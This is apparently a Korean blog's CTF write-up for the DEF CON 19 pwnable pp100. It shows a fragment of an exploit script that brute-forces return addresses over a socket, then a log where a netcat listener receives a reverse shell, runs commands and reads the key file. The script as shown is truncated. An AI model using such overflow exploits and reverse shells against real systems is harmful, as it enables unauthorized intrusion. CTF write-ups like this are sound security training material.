Category : Pwnables
* file |
Summary : overwring max length of recving data
exploit.py |
#!/usr/bin/python from socket import * def pack(data): HOST = "192.168.123.129" for ret in range(0xbfbfefff , 0xbfbf0000 , -20): |
[pwn3r@localhost defcon19]$ ./exploit.py & nc -lv 4444 [1] 10196 Connection from 192.168.123.129 port 4444 [tcp/krb524] accepted id uid=1002(carebeard) gid=1002(carebeard) groups=1002(carebeard) ls -l total 28 -r-------- 1 carebeard carebeard 25 Sep 12 15:06 key -rwxr-xr-x 1 carebeard carebeard 11056 Jul 9 13:24 pp100 cat key godzilla ate my tomagaci |
'CTF' 카테고리의 다른 글
ISEC 2011 본선 CTF - board (0) | 2011.09.21 |
---|---|
ISEC 2010 본선 CTF - hks (0) | 2011.09.17 |
2010 순천향대 정보보호 페스티벌 level9 (0) | 2011.09.11 |
Padocon 2011 Quals - Karma200 (0) | 2011.07.17 |
Padocon 2011 Quals - Karma100 (2) | 2011.07.17 |